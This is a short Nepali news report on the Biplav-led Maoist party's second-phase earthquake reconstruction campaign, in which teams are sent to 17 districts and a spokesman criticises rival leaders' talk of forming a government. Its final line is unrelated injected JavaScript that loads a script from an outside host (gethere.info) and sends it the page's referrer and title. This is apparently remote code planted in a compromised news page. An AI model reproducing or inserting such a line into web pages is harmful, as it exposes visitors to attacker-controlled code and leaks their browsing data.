विप्लव नेतृत्वको नेकपा माओवादीले भूकम्पपछिको पुनःनिर्माणका लागि दोस्रो चरणको अभियान सुरु गरेको छ। अभियान अन्तगर्त जेठ ७ गते भूकम्प प्रभावित जिल्लामा गएका नेकपा माओवादी नेता कार्यकर्ता फर्किएका छन् भने सोमबार नयाँ टोलीलाई पठाईएको छ। त्रिभुवन पार्क काठमाण्डुमा कार्यक्रम गरेर महासचिव नेत्रविक्रम चन्द विप्लवले भूकम्प प्रभावित १७ जिल्लामा जाने नयाँ टोलीलाई विदाई गर्नुभएको छ। आफूहरु अब भूकम्प प्रभावित जनताका लागि अवास निर्माणमा लाग्ने महासचिव विप्लवको भनाई छ।
भूकम्प प्रभावित सबै जिल्लाका केन्द्रीय सदस्यको नेतृत्वमा पुन निर्माणका लागि टोली खटिएको छ। यसैबीच सरकार निर्माणको प्रयासलाई विप्लव नेतृत्व माओवादीले वेमौसमी बाजा भनेको छ। विपद्का बेला राजनीतिक दलहरुबीच बलियो संयन्त्र बनाएर पुन निर्माणमा लाग्नुपर्ने बेला सरकारको कुरा उठाउनु गलत भनेको छ। पार्टी प्रवक्ता खड्कबहादुर विश्वकर्माले विपद्मा परेका जनतालाई सहयोग गर्नुपर्ने ठाँउमा सरकारको कुरा उठाएर नेताहरुले आफ्नो व्यक्तिगत स्वार्थमात्रै पुरा गर्न लागेको आरोप लगाउनुभयो। उहाले अहिले सरकारको कुरा छाडेर सबै नेपालको पूर्ननिर्माणमा एक हुनुपर्ने बताउनुभयो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;